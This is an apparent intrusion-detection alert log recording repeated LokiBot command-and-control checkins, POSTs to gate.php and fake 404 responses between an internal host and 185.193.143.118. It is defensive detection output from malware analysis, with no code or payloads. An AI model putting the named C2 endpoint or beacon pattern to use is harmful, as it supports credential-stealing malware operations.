12/21/20-08:34:37.759174	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49295	80	192.168.2.22	185.193.143.118
12/21/20-08:34:37.948973	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49295	185.193.143.118	192.168.2.22
12/21/20-08:34:38.210194	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49296	80	192.168.2.22	185.193.143.118
12/21/20-08:34:38.210194	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49296	80	192.168.2.22	185.193.143.118
12/21/20-08:34:38.210194	TCP	2025381	ET TROJAN LokiBot Checkin	49296	80	192.168.2.22	185.193.143.118
12/21/20-08:34:38.210194	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49296	80	192.168.2.22	185.193.143.118
12/21/20-08:34:38.210194	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49296	80	192.168.2.22	185.193.143.118
12/21/20-08:34:38.398350	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49296	185.193.143.118	192.168.2.22
12/21/20-08:34:38.671751	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49297	80	192.168.2.22	185.193.143.118
12/21/20-08:34:38.671751	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49297	80	192.168.2.22	185.193.143.118
12/21/20-08:34:38.671751	TCP	2025381	ET TROJAN LokiBot Checkin	49297	80	192.168.2.22	185.193.143.118
12/21/20-08:34:38.671751	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49297	80	192.168.2.22	185.193.143.118
12/21/20-08:34:38.671751	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49297	80	192.168.2.22	185.193.143.118
12/21/20-08:34:38.856241	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49297	185.193.143.118	192.168.2.22
12/21/20-08:34:39.105133	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49298	80	192.168.2.22	185.193.143.118
12/21/20-08:34:39.105133	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49298	80	192.168.2.22	185.193.143.118
12/21/20-08:34:39.105133	TCP	2025381	ET TROJAN LokiBot Checkin	49298	80	192.168.2.22	185.193.143.118
12/21/20-08:34:39.105133	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49298	80	192.168.2.22	185.193.143.118
12/21/20-08:34:39.105133	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49298	80	192.168.2.22	185.193.143.118
12/21/20-08:34:39.286987	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49298	185.193.143.118	192.168.2.22
12/21/20-08:34:39.556085	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49299	80	192.168.2.22	185.193.143.118
12/21/20-08:34:39.556085	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49299	80	192.168.2.22	185.193.143.118
12/21/20-08:34:39.556085	TCP	2025381	ET TROJAN LokiBot Checkin	49299	80	192.168.2.22	185.193.143.118
12/21/20-08:34:39.556085	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49299	80	192.168.2.22	185.193.143.118
12/21/20-08:34:39.556085	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49299	80	192.168.2.22	185.193.143.118
12/21/20-08:34:39.755602	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49299	185.193.143.118	192.168.2.22
12/21/20-08:34:40.016911	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49300	80	192.168.2.22	185.193.143.118
12/21/20-08:34:40.016911	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49300	80	192.168.2.22	185.193.143.118
12/21/20-08:34:40.016911	TCP	2025381	ET TROJAN LokiBot Checkin	49300	80	192.168.2.22	185.193.143.118
12/21/20-08:34:40.016911	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49300	80	192.168.2.22	185.193.143.118
12/21/20-08:34:40.016911	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49300	80	192.168.2.22	185.193.143.118
12/21/20-08:34:40.205010	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49300	185.193.143.118	192.168.2.22
12/21/20-08:34:40.489842	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49301	80	192.168.2.22	185.193.143.118
12/21/20-08:34:40.489842	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49301	80	192.168.2.22	185.193.143.118
12/21/20-08:34:40.489842	TCP	2025381	ET TROJAN LokiBot Checkin	49301	80	192.168.2.22	185.193.143.118
12/21/20-08:34:40.489842	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49301	80	192.168.2.22	185.193.143.118
12/21/20-08:34:40.489842	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49301	80	192.168.2.22	185.193.143.118
12/21/20-08:34:40.690090	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49301	185.193.143.118	192.168.2.22
12/21/20-08:34:40.965176	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49302	80	192.168.2.22	185.193.143.118
12/21/20-08:34:40.965176	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49302	80	192.168.2.22	185.193.143.118
12/21/20-08:34:40.965176	TCP	2025381	ET TROJAN LokiBot Checkin	49302	80	192.168.2.22	185.193.143.118
12/21/20-08:34:40.965176	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49302	80	192.168.2.22	185.193.143.118
12/21/20-08:34:40.965176	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49302	80	192.168.2.22	185.193.143.118
12/21/20-08:34:41.148495	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49302	185.193.143.118	192.168.2.22
12/21/20-08:34:41.423697	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49303	80	192.168.2.22	185.193.143.118
12/21/20-08:34:41.423697	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49303	80	192.168.2.22	185.193.143.118
12/21/20-08:34:41.423697	TCP	2025381	ET TROJAN LokiBot Checkin	49303	80	192.168.2.22	185.193.143.118
12/21/20-08:34:41.423697	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49303	80	192.168.2.22	185.193.143.118
12/21/20-08:34:41.423697	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49303	80	192.168.2.22	185.193.143.118
12/21/20-08:34:41.618470	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49303	185.193.143.118	192.168.2.22
12/21/20-08:34:41.877857	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49304	80	192.168.2.22	185.193.143.118
12/21/20-08:34:41.877857	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49304	80	192.168.2.22	185.193.143.118
12/21/20-08:34:41.877857	TCP	2025381	ET TROJAN LokiBot Checkin	49304	80	192.168.2.22	185.193.143.118
12/21/20-08:34:41.877857	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49304	80	192.168.2.22	185.193.143.118
12/21/20-08:34:41.877857	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49304	80	192.168.2.22	185.193.143.118
12/21/20-08:34:42.063981	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49304	185.193.143.118	192.168.2.22
12/21/20-08:34:42.325852	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49305	80	192.168.2.22	185.193.143.118
12/21/20-08:34:42.325852	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49305	80	192.168.2.22	185.193.143.118
12/21/20-08:34:42.325852	TCP	2025381	ET TROJAN LokiBot Checkin	49305	80	192.168.2.22	185.193.143.118
12/21/20-08:34:42.325852	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49305	80	192.168.2.22	185.193.143.118
12/21/20-08:34:42.325852	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49305	80	192.168.2.22	185.193.143.118
12/21/20-08:34:42.520302	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49305	185.193.143.118	192.168.2.22
12/21/20-08:34:42.778146	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49306	80	192.168.2.22	185.193.143.118
12/21/20-08:34:42.778146	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49306	80	192.168.2.22	185.193.143.118
12/21/20-08:34:42.778146	TCP	2025381	ET TROJAN LokiBot Checkin	49306	80	192.168.2.22	185.193.143.118
12/21/20-08:34:42.778146	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49306	80	192.168.2.22	185.193.143.118
12/21/20-08:34:42.778146	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49306	80	192.168.2.22	185.193.143.118
12/21/20-08:34:42.961060	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49306	185.193.143.118	192.168.2.22
12/21/20-08:34:43.216171	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49307	80	192.168.2.22	185.193.143.118
12/21/20-08:34:43.216171	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49307	80	192.168.2.22	185.193.143.118
12/21/20-08:34:43.216171	TCP	2025381	ET TROJAN LokiBot Checkin	49307	80	192.168.2.22	185.193.143.118
12/21/20-08:34:43.216171	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49307	80	192.168.2.22	185.193.143.118
12/21/20-08:34:43.216171	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49307	80	192.168.2.22	185.193.143.118
12/21/20-08:34:43.400025	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49307	185.193.143.118	192.168.2.22
12/21/20-08:34:43.656410	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49308	80	192.168.2.22	185.193.143.118
12/21/20-08:34:43.656410	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49308	80	192.168.2.22	185.193.143.118
12/21/20-08:34:43.656410	TCP	2025381	ET TROJAN LokiBot Checkin	49308	80	192.168.2.22	185.193.143.118
12/21/20-08:34:43.656410	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49308	80	192.168.2.22	185.193.143.118
12/21/20-08:34:43.656410	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49308	80	192.168.2.22	185.193.143.118
12/21/20-08:34:43.853422	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49308	185.193.143.118	192.168.2.22
12/21/20-08:34:44.106562	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49309	80	192.168.2.22	185.193.143.118
12/21/20-08:34:44.106562	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49309	80	192.168.2.22	185.193.143.118
12/21/20-08:34:44.106562	TCP	2025381	ET TROJAN LokiBot Checkin	49309	80	192.168.2.22	185.193.143.118
12/21/20-08:34:44.106562	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49309	80	192.168.2.22	185.193.143.118
12/21/20-08:34:44.106562	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49309	80	192.168.2.22	185.193.143.118
12/21/20-08:34:44.292245	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49309	185.193.143.118	192.168.2.22
12/21/20-08:34:44.544426	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49310	80	192.168.2.22	185.193.143.118
12/21/20-08:34:44.544426	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49310	80	192.168.2.22	185.193.143.118
12/21/20-08:34:44.544426	TCP	2025381	ET TROJAN LokiBot Checkin	49310	80	192.168.2.22	185.193.143.118
12/21/20-08:34:44.544426	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49310	80	192.168.2.22	185.193.143.118
12/21/20-08:34:44.544426	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49310	80	192.168.2.22	185.193.143.118
12/21/20-08:34:44.748707	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49310	185.193.143.118	192.168.2.22
12/21/20-08:34:45.030307	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49311	80	192.168.2.22	185.193.143.118
12/21/20-08:34:45.030307	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49311	80	192.168.2.22	185.193.143.118
12/21/20-08:34:45.030307	TCP	2025381	ET TROJAN LokiBot Checkin	49311	80	192.168.2.22	185.193.143.118
12/21/20-08:34:45.030307	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49311	80	192.168.2.22	185.193.143.118
12/21/20-08:34:45.030307	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49311	80	192.168.2.22	185.193.143.118
12/21/20-08:34:45.235508	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49311	185.193.143.118	192.168.2.22
12/21/20-08:34:45.493159	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49312	80	192.168.2.22	185.193.143.118
12/21/20-08:34:45.493159	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49312	80	192.168.2.22	185.193.143.118
12/21/20-08:34:45.493159	TCP	2025381	ET TROJAN LokiBot Checkin	49312	80	192.168.2.22	185.193.143.118
12/21/20-08:34:45.493159	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49312	80	192.168.2.22	185.193.143.118
12/21/20-08:34:45.493159	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49312	80	192.168.2.22	185.193.143.118
12/21/20-08:34:45.681647	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49312	185.193.143.118	192.168.2.22
12/21/20-08:34:45.965226	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49313	80	192.168.2.22	185.193.143.118
12/21/20-08:34:45.965226	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49313	80	192.168.2.22	185.193.143.118
12/21/20-08:34:45.965226	TCP	2025381	ET TROJAN LokiBot Checkin	49313	80	192.168.2.22	185.193.143.118
12/21/20-08:34:45.965226	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49313	80	192.168.2.22	185.193.143.118
12/21/20-08:34:45.965226	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49313	80	192.168.2.22	185.193.143.118
12/21/20-08:34:46.144673	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49313	185.193.143.118	192.168.2.22
12/21/20-08:34:46.385293	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49314	80	192.168.2.22	185.193.143.118
12/21/20-08:34:46.385293	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49314	80	192.168.2.22	185.193.143.118
12/21/20-08:34:46.385293	TCP	2025381	ET TROJAN LokiBot Checkin	49314	80	192.168.2.22	185.193.143.118
12/21/20-08:34:46.385293	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49314	80	192.168.2.22	185.193.143.118
12/21/20-08:34:46.385293	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49314	80	192.168.2.22	185.193.143.118
12/21/20-08:34:46.572973	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49314	185.193.143.118	192.168.2.22
12/21/20-08:34:46.831908	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49315	80	192.168.2.22	185.193.143.118
12/21/20-08:34:46.831908	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49315	80	192.168.2.22	185.193.143.118
12/21/20-08:34:46.831908	TCP	2025381	ET TROJAN LokiBot Checkin	49315	80	192.168.2.22	185.193.143.118
12/21/20-08:34:46.831908	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49315	80	192.168.2.22	185.193.143.118
12/21/20-08:34:46.831908	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49315	80	192.168.2.22	185.193.143.118
12/21/20-08:34:47.024399	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49315	185.193.143.118	192.168.2.22
12/21/20-08:34:47.278368	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49316	80	192.168.2.22	185.193.143.118
12/21/20-08:34:47.278368	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49316	80	192.168.2.22	185.193.143.118
12/21/20-08:34:47.278368	TCP	2025381	ET TROJAN LokiBot Checkin	49316	80	192.168.2.22	185.193.143.118
12/21/20-08:34:47.278368	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49316	80	192.168.2.22	185.193.143.118
12/21/20-08:34:47.278368	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49316	80	192.168.2.22	185.193.143.118
12/21/20-08:34:47.471688	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49316	185.193.143.118	192.168.2.22
12/21/20-08:34:49.748142	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49317	80	192.168.2.22	185.193.143.118
12/21/20-08:34:49.748142	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49317	80	192.168.2.22	185.193.143.118
12/21/20-08:34:49.748142	TCP	2025381	ET TROJAN LokiBot Checkin	49317	80	192.168.2.22	185.193.143.118
12/21/20-08:34:49.748142	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49317	80	192.168.2.22	185.193.143.118
12/21/20-08:34:49.748142	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49317	80	192.168.2.22	185.193.143.118
12/21/20-08:34:49.936609	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49317	185.193.143.118	192.168.2.22
12/21/20-08:34:50.191619	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49318	80	192.168.2.22	185.193.143.118
12/21/20-08:34:50.191619	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49318	80	192.168.2.22	185.193.143.118
12/21/20-08:34:50.191619	TCP	2025381	ET TROJAN LokiBot Checkin	49318	80	192.168.2.22	185.193.143.118
12/21/20-08:34:50.191619	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49318	80	192.168.2.22	185.193.143.118
12/21/20-08:34:50.191619	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49318	80	192.168.2.22	185.193.143.118
12/21/20-08:34:50.381012	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49318	185.193.143.118	192.168.2.22
12/21/20-08:34:50.644380	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49319	80	192.168.2.22	185.193.143.118
12/21/20-08:34:50.644380	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49319	80	192.168.2.22	185.193.143.118
12/21/20-08:34:50.644380	TCP	2025381	ET TROJAN LokiBot Checkin	49319	80	192.168.2.22	185.193.143.118
12/21/20-08:34:50.644380	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49319	80	192.168.2.22	185.193.143.118
12/21/20-08:34:50.644380	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49319	80	192.168.2.22	185.193.143.118
12/21/20-08:34:50.836068	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49319	185.193.143.118	192.168.2.22
12/21/20-08:34:51.092145	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49320	80	192.168.2.22	185.193.143.118
12/21/20-08:34:51.092145	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49320	80	192.168.2.22	185.193.143.118
12/21/20-08:34:51.092145	TCP	2025381	ET TROJAN LokiBot Checkin	49320	80	192.168.2.22	185.193.143.118
12/21/20-08:34:51.092145	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49320	80	192.168.2.22	185.193.143.118
12/21/20-08:34:51.092145	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49320	80	192.168.2.22	185.193.143.118
12/21/20-08:34:51.279040	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49320	185.193.143.118	192.168.2.22
12/21/20-08:34:51.642592	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49321	80	192.168.2.22	185.193.143.118
12/21/20-08:34:51.642592	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49321	80	192.168.2.22	185.193.143.118
12/21/20-08:34:51.642592	TCP	2025381	ET TROJAN LokiBot Checkin	49321	80	192.168.2.22	185.193.143.118
12/21/20-08:34:51.642592	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49321	80	192.168.2.22	185.193.143.118
12/21/20-08:34:51.642592	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49321	80	192.168.2.22	185.193.143.118
12/21/20-08:34:51.822869	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49321	185.193.143.118	192.168.2.22
12/21/20-08:34:52.076004	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49322	80	192.168.2.22	185.193.143.118
12/21/20-08:34:52.076004	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49322	80	192.168.2.22	185.193.143.118
12/21/20-08:34:52.076004	TCP	2025381	ET TROJAN LokiBot Checkin	49322	80	192.168.2.22	185.193.143.118
12/21/20-08:34:52.076004	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49322	80	192.168.2.22	185.193.143.118
12/21/20-08:34:52.076004	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49322	80	192.168.2.22	185.193.143.118
12/21/20-08:34:52.725966	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49322	185.193.143.118	192.168.2.22
12/21/20-08:34:53.324671	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49323	80	192.168.2.22	185.193.143.118
12/21/20-08:34:53.324671	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49323	80	192.168.2.22	185.193.143.118
12/21/20-08:34:53.324671	TCP	2025381	ET TROJAN LokiBot Checkin	49323	80	192.168.2.22	185.193.143.118
12/21/20-08:34:53.324671	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49323	80	192.168.2.22	185.193.143.118
12/21/20-08:34:53.324671	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49323	80	192.168.2.22	185.193.143.118
12/21/20-08:34:53.510987	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49323	185.193.143.118	192.168.2.22
12/21/20-08:34:53.771213	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49324	80	192.168.2.22	185.193.143.118
12/21/20-08:34:53.771213	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49324	80	192.168.2.22	185.193.143.118
12/21/20-08:34:53.771213	TCP	2025381	ET TROJAN LokiBot Checkin	49324	80	192.168.2.22	185.193.143.118
12/21/20-08:34:53.771213	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49324	80	192.168.2.22	185.193.143.118
12/21/20-08:34:53.771213	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49324	80	192.168.2.22	185.193.143.118
12/21/20-08:34:53.966468	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49324	185.193.143.118	192.168.2.22
12/21/20-08:34:54.225843	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49325	80	192.168.2.22	185.193.143.118
12/21/20-08:34:54.225843	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49325	80	192.168.2.22	185.193.143.118
12/21/20-08:34:54.225843	TCP	2025381	ET TROJAN LokiBot Checkin	49325	80	192.168.2.22	185.193.143.118
12/21/20-08:34:54.225843	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49325	80	192.168.2.22	185.193.143.118
12/21/20-08:34:54.225843	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49325	80	192.168.2.22	185.193.143.118
12/21/20-08:34:54.429844	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49325	185.193.143.118	192.168.2.22
12/21/20-08:34:54.695089	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49326	80	192.168.2.22	185.193.143.118
12/21/20-08:34:54.695089	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49326	80	192.168.2.22	185.193.143.118
12/21/20-08:34:54.695089	TCP	2025381	ET TROJAN LokiBot Checkin	49326	80	192.168.2.22	185.193.143.118
12/21/20-08:34:54.695089	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49326	80	192.168.2.22	185.193.143.118
12/21/20-08:34:54.695089	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49326	80	192.168.2.22	185.193.143.118
12/21/20-08:34:54.893503	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49326	185.193.143.118	192.168.2.22
12/21/20-08:34:55.167333	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49327	80	192.168.2.22	185.193.143.118
12/21/20-08:34:55.167333	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49327	80	192.168.2.22	185.193.143.118
12/21/20-08:34:55.167333	TCP	2025381	ET TROJAN LokiBot Checkin	49327	80	192.168.2.22	185.193.143.118
12/21/20-08:34:55.167333	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49327	80	192.168.2.22	185.193.143.118
12/21/20-08:34:55.167333	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49327	80	192.168.2.22	185.193.143.118
12/21/20-08:34:55.360511	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49327	185.193.143.118	192.168.2.22
12/21/20-08:34:55.621686	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49328	80	192.168.2.22	185.193.143.118
12/21/20-08:34:55.621686	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49328	80	192.168.2.22	185.193.143.118
12/21/20-08:34:55.621686	TCP	2025381	ET TROJAN LokiBot Checkin	49328	80	192.168.2.22	185.193.143.118
12/21/20-08:34:55.621686	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49328	80	192.168.2.22	185.193.143.118
12/21/20-08:34:55.621686	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49328	80	192.168.2.22	185.193.143.118
12/21/20-08:34:55.806793	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49328	185.193.143.118	192.168.2.22
12/21/20-08:34:56.079166	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49329	80	192.168.2.22	185.193.143.118
12/21/20-08:34:56.079166	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49329	80	192.168.2.22	185.193.143.118
12/21/20-08:34:56.079166	TCP	2025381	ET TROJAN LokiBot Checkin	49329	80	192.168.2.22	185.193.143.118
12/21/20-08:34:56.079166	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49329	80	192.168.2.22	185.193.143.118
12/21/20-08:34:56.079166	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49329	80	192.168.2.22	185.193.143.118
12/21/20-08:34:56.264152	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49329	185.193.143.118	192.168.2.22
12/21/20-08:34:56.523450	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49330	80	192.168.2.22	185.193.143.118
12/21/20-08:34:56.523450	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49330	80	192.168.2.22	185.193.143.118
12/21/20-08:34:56.523450	TCP	2025381	ET TROJAN LokiBot Checkin	49330	80	192.168.2.22	185.193.143.118
12/21/20-08:34:56.523450	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49330	80	192.168.2.22	185.193.143.118
12/21/20-08:34:56.523450	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49330	80	192.168.2.22	185.193.143.118
12/21/20-08:34:56.707082	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49330	185.193.143.118	192.168.2.22
12/21/20-08:34:56.986700	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49331	80	192.168.2.22	185.193.143.118
12/21/20-08:34:56.986700	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49331	80	192.168.2.22	185.193.143.118
12/21/20-08:34:56.986700	TCP	2025381	ET TROJAN LokiBot Checkin	49331	80	192.168.2.22	185.193.143.118
12/21/20-08:34:56.986700	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49331	80	192.168.2.22	185.193.143.118
12/21/20-08:34:56.986700	TCP	2017930	ET TROJAN Trojan Generic - POST To gate.php with no referer	49331	80	192.168.2.22	185.193.143.118
12/21/20-08:34:57.170484	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49331	185.193.143.118	192.168.2.22
